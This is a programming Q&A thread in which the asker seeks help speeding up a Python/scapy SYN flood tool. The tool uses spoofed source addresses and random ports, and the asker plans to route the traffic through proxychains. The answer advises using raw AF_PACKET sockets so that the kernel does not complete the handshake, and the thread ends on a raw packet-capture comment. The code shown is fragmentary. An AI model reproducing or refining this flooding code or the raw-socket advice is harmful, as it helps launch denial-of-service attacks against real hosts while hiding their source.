# How to fix: Defined Packet with SYN flag and it gets send with PSH, ACK flag

Tags: python, sockets, tcp, scapy

I'm coding a penetration testing tool which performs a SYN flood attack. The attack perfectly works till I try to speed up the packet send speed using my own socket:

```py
import socket
import scapy
silva = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#silva.connect((destinationnew, targetport)) With this the attack does not work
silva.send(bytes(IP(dst = str(destinationnew), src = str(Ip_range), ttl=int(random.randint(80, 254)))/TCP(dport = int(targetport), sport = int(random.randint(1024, 65535)), flags = "S")))
```

The script atomically performs a three way handshake and then sends PSH, ACK packets

-> I want the script to use a socket to later run it through proxychains but I don't know how to establish a socket through which I can send SYN packets only.

Answer (score 0):

You're trying to do something low-level outside of the normal TCP flow, so you need to use raw sockets:

```
silva = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
silva.bind(("en0", 0)) # or eth0 or whatever your interface is
```

Then send SYN packets, and the TCP machinery will not take over and do ACKs and other things you don't want.

Note, you may need some additional permissions on your local operating system to enable raw socket creation.

Comment: If I do this and then send the packets through my socket it dos neot send SYN packets it sends:

Comment: 6636 8.851449166 Applicon_06:18:99 45:00:00:28:00:01 0x0a00 40 Ethernet II